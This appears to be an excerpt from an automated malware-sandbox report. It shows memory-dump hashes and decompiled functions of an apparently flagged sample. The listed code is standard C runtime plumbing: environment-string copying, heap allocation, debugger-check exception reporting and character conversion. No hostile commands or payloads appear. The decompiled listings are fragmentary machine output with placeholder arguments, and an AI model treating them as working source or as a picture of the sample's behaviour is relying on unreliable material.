Opcode Fuzzy Hash: fd09aac7faab70b07063f4dd0a7188a54cc488c034c0cb59786f750f13e63d91
Instruction Fuzzy Hash: 1FA1F570D00218CFDB24DFA9C548BDDBBB1FF89308F208269E419AB291DB749985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0234D1C0, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 511f8cf767e88a18c123733c3dfb32ec13a2db8f0719330c56d35d061962a54e
Instruction ID: 36d1a0077ea685bc389700b443667afb3827d1eecf8f07978f59796c8cbfb1bb
Opcode Fuzzy Hash: 511f8cf767e88a18c123733c3dfb32ec13a2db8f0719330c56d35d061962a54e
Instruction Fuzzy Hash: 85A1E570E00218CFDB14DFA9C588BDDBBB1FF89308F248269E409AB295DB749985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0234D516, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9673e27a890d93b48c0da9705adb0d639786f07ffba9492f0aa31f14ced0199c
Instruction ID: 250ee80af7ced3a08115382e2e17b1f9973367ff50b30f4f0d62754a22e53406
Opcode Fuzzy Hash: 9673e27a890d93b48c0da9705adb0d639786f07ffba9492f0aa31f14ced0199c
Instruction Fuzzy Hash: FF91E370900218CFDB10DFA8C448BDDBBF5FF49318F2082A9E419AB291DB74A985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 0234A142, Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0234A1F6

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: efb8c5d7bbf1b76ee3ba88bccfbbc41e1bec67c55ad7433e2ec45f324d2e8f30
Instruction ID: c49fd882d229cb83de9a2c4437ebb0d67301caea20c925a94abf0107be8ba79d
Opcode Fuzzy Hash: efb8c5d7bbf1b76ee3ba88bccfbbc41e1bec67c55ad7433e2ec45f324d2e8f30
Instruction Fuzzy Hash: EF51F1748B82468FD7006B24EAAC17BBF62FF5F3137016E79E10E82455DFB84945CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0234A150, Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0234A1F6

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 26d6adb85ce1729bd9628866816cf5109229e9176549fa0637fe3129411c6fbb
Instruction ID: 03a45d2c560d7466719e374ab0a0ec3a87d9fc36b38008444b682fe2a437c0dd
Opcode Fuzzy Hash: 26d6adb85ce1729bd9628866816cf5109229e9176549fa0637fe3129411c6fbb
Instruction Fuzzy Hash: 5B51CE348B82068FD7046B64EAAC17BBE66FF5F3137016E34E10E828559FB80985CA60

Uniqueness

Uniqueness Score: -1.00%

Function 05948140, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3018f64500b2cfafad2433bf5ea04d279175c132556e1f52c81ea20879b87033
Instruction ID: 7d86a72b428c6b1f2a727d56b2d1a67c2c474fe704e8984541f147c4ff9e26df
Opcode Fuzzy Hash: 3018f64500b2cfafad2433bf5ea04d279175c132556e1f52c81ea20879b87033
Instruction Fuzzy Hash: 2851F2B0E01218DBDB18CFAAD884ADDBBB6BF89314F10C529E415BB294DB749885CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059482DB, Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca39c0620dcfd1be0753d1dc88746d0f99fde4edffb4b880f51ab68258d7fcb4
Instruction ID: 469b8baf32c3deba0d98a8212bbfbec84a711f9f4210ed234efaf09769f9dcad
Opcode Fuzzy Hash: ca39c0620dcfd1be0753d1dc88746d0f99fde4edffb4b880f51ab68258d7fcb4
Instruction Fuzzy Hash: 2D51FEB4E04218CFCB14DFE9D484AEDBBB6FB49314F208929E425BB290D7749886CF14

Uniqueness

Uniqueness Score: -1.00%

Function 05948594, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a21f2ad117219a84020a9fa2b04ce93dd0f11c1c3fb574c9ca6b9b8b3f23db
Instruction ID: 7f0760b698ffe41c0a37b7c5bbcc8b0ab3e8dca8841c66fabba5120a2d96e527
Opcode Fuzzy Hash: 26a21f2ad117219a84020a9fa2b04ce93dd0f11c1c3fb574c9ca6b9b8b3f23db
Instruction Fuzzy Hash: 3B415874A08149DFCB14DF98C4A4EEDBBB6FF49304F249598D41AAB281CB31AD86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059483E8, Relevance: 1.6, APIs: 1, Instructions: 105libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05948449

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fbc0334e20a75bbf8c4fc43124ebbde03f9f63e81da0958e720b14d8b57db9b
Instruction ID: 28d75b09c3b9ac76f0fc0506948143a5cb8ddb672c2965b2db83e15033951048
Opcode Fuzzy Hash: 0fbc0334e20a75bbf8c4fc43124ebbde03f9f63e81da0958e720b14d8b57db9b
Instruction Fuzzy Hash: D04177B0E04208DBDB14CF99C5C4ADDFBB6FF88304F248268D4046B281C735A986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05948534, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe374c5554c85b3f131b43b1ba62fcb383a0f575f0c9eeacd1e235cc883adf9
Instruction ID: 95846ce8a2a864f0a9151450a749e9edb5a020c63a15f5391ced2ddbee87d929
Opcode Fuzzy Hash: afe374c5554c85b3f131b43b1ba62fcb383a0f575f0c9eeacd1e235cc883adf9
Instruction Fuzzy Hash: 0F413474A04209DFCB14DF98D094EECBBB6FF49314F248698E419AB281C735AC86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD030, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926293209.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8602b5ed3f37b4b9ece6eb46ebc9c20fe2e9acf8461bb4918b31bb9b424a60d8
Instruction ID: 50f3fb89e1291cc061504f66d1843fdeada3646e8061a6b06e1e05f3f58da2d2
Opcode Fuzzy Hash: 8602b5ed3f37b4b9ece6eb46ebc9c20fe2e9acf8461bb4918b31bb9b424a60d8
Instruction Fuzzy Hash: C021F871508248DFCB14DF24D8D4B26BBA6FB84314F34C5ADD9094B246CB36D84BD661

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD006, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926293209.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815abb9be8dac9ce6d196c94592a1708e8475c0c8cd203ac789f1a0fffaaa68c
Instruction ID: f4875ac22348d79752136ff643936a2bb5d75671e0a77e8706d47ca767b13cf8
Opcode Fuzzy Hash: 815abb9be8dac9ce6d196c94592a1708e8475c0c8cd203ac789f1a0fffaaa68c
Instruction Fuzzy Hash: C6215E755097C49FCB02CB24D994B11BFB1EB46314F2985DBD8488F2A7C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0xd3ed1eb0
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}

0x0040446f
0x0040446f
0x0040446f
0x0040447a
0x0040447f
0x00404481
0x00404488
0x00404489
0x0040448b
0x0040448e
0x00404493
0x00404493
0x0040449f
0x004044b2
0x004044c0
0x004044c6
0x004044cc
0x004044d2
0x004044d8
0x004044de
0x004044e4
0x004044ea
0x004044f0
0x004044f6
0x004044fd
0x00404504
0x0040450b
0x00404512
0x00404519
0x00404520
0x00404521
0x0040452a
0x00404530
0x00404533
0x00404539
0x00404546
0x0040454f
0x00404558
0x00404561
0x0040456f
0x00404571
0x0040457e
0x00404586
0x00404592
0x00404595
0x0040459a
0x004045a1
0x004045a9

APIs

IsDebuggerPresent.KERNEL32 ref: 00404567
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004067fe
0x00406806
0x0040680e

APIs

GetProcessHeap.KERNEL32 ref: 004067FE

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08

Uniqueness

Uniqueness Score: -1.00%

Function 0234B6F8, Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706db46d75bf37829939c10d1454ba1ad20eee0a07f83ec06c7176918614f331
Instruction ID: 2f4d2b4684cf87124a898ea6c44325f4783a3fa293ba28065f4464db030f1f7c
Opcode Fuzzy Hash: 706db46d75bf37829939c10d1454ba1ad20eee0a07f83ec06c7176918614f331
Instruction Fuzzy Hash: ED52A974E012688FDB64DF65C884BDDBBB2BB89304F1085EAD409AB355DB34AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0234C6C8, Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532bcbc24977c4897762811d90106a3d56e98b2633cd26872ca805f9b06c6d6d
Instruction ID: ee44c3e9b5ac232d68aa671f2cfb11b284eb619667c489a8f25e688d359eb35b
Opcode Fuzzy Hash: 532bcbc24977c4897762811d90106a3d56e98b2633cd26872ca805f9b06c6d6d
Instruction Fuzzy Hash: 1D42CF74E012688FDB24DFA8C884BDDBBB1BB48304F2495EAD449A7355DB74AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059708F0, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6599b74f29db510d33cbfb59ba7ac11f0fb8f6df4759e41889eb050477b6ea0d
Instruction ID: 039226f29aa16446bda5361222eec3f4e76dab8f65985fd777433b330548e9f4
Opcode Fuzzy Hash: 6599b74f29db510d33cbfb59ba7ac11f0fb8f6df4759e41889eb050477b6ea0d
Instruction Fuzzy Hash: EEB17074E00218CFDB54DFA9D884A9DBBB2BF89314F2481A9D819AB365DB30AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0234BD2B, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 483c110e0cdb31a00a7de10c2c0fb99b635a49400f42e8612527a3327a9c6d4b
Instruction ID: 0582ae23b110af526fc6dac153368a0ec47ff7025cfdb344f9f610d31aaca2d3
Opcode Fuzzy Hash: 483c110e0cdb31a00a7de10c2c0fb99b635a49400f42e8612527a3327a9c6d4b
Instruction Fuzzy Hash: 4EA1CC74A05268CFDB64DF24C844BD9BBB2BB8A304F1085EAD50EAB350CB719E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 059708E0, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2eba2e9ca12bdf57f5e36d8cf907b812b4707fbe2262be2e135e00fd826a812
Instruction ID: 8f6690d1db7ff25b99992602af5df48eb4d3fc1f715bb7d70ac2a9684031e791
Opcode Fuzzy Hash: f2eba2e9ca12bdf57f5e36d8cf907b812b4707fbe2262be2e135e00fd826a812
Instruction Fuzzy Hash: 04518474E00608CFDB48DFAAD984A9DBBF2FF89300F249169D419AB365DB309942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0234BF0C, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d0f15afb5c6b4d58608ce04b51baf81574b8e5dbb8a3b3015d54f5f13c6cad
Instruction ID: 03d5c88ea429d52cfebf8b09b2094d42929cce829b4a89c6936831ab1dd6f5c2
Opcode Fuzzy Hash: 41d0f15afb5c6b4d58608ce04b51baf81574b8e5dbb8a3b3015d54f5f13c6cad
Instruction Fuzzy Hash: 4151AD74A05228DFDB64DF24C854B99BBB2FB4A305F5089EAD40AA7350CB75AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xd3ed1eb0
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

